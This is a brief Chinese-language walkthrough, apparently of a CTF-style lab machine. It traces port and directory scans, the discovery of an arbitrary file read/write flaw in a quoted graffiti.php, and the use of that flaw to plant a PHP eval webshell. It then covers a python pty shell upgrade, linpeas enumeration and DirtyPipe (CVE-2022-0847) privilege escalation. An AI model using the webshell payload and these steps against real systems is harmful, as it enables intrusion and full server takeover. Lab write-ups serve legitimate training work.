端口扫描
80
81
需要用户名密码登录
目录扫描
robots.txt
妹用
找不到利用点,换个扫描器再扫
发现新的文件
graffiti.txt
graffiti.php
输入的数据Post后会回显到页面上
抓包看看,居然直接传文件路径
发现我们post的数据被写入了graffiti.txt文件
这里有可能存在文件任意读取漏洞,尝试修改file的值
发现可以读取graffiti.php文件
查看php内容
file默认值为graffifi.txt,接收file,message两个post参数
若存在message参数,则打开file文件并写入
<br>
$file="graffiti.txt";
<br>
if($_SERVER['REQUEST_METHOD'] == 'POST') {
<br>if (isset($_POST['file'])) {
<br>$file=$_POST['file'];
<br>}
<br>if (isset($_POST['message'])) {
<br>$handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);
<br>fwrite($handle, $_POST['message']);
<br>fwrite($handle, "\n");
<br>fclose($file);
<br>}
<br>
}
<br><br>
// Display file
<br>
$handle = fopen($file,"r");
<br>
while (!feof($handle)) {
<br>echo fgets($handle);
<br>echo "<br>\n";
<br>
}
<br>
fclose($handle);
可以看出来通过修改file的值,可以实现文件任意写入
直接修改file为graffiti.php,message传入一句话木马,蚁剑连接
<?php @eval($_POST['cc']);?>
反弹shell
半交互回显
python3 -c 'import pty; pty.spawn("/bin/bash")'
翻找文件时发现的
提权
上传linpeas.sh
好几个cve漏洞
从年份近的开始试起
CVE-2022-0847 DirtyPipe
添加链接描述
执行权限好像不够,直接加777
提权成功
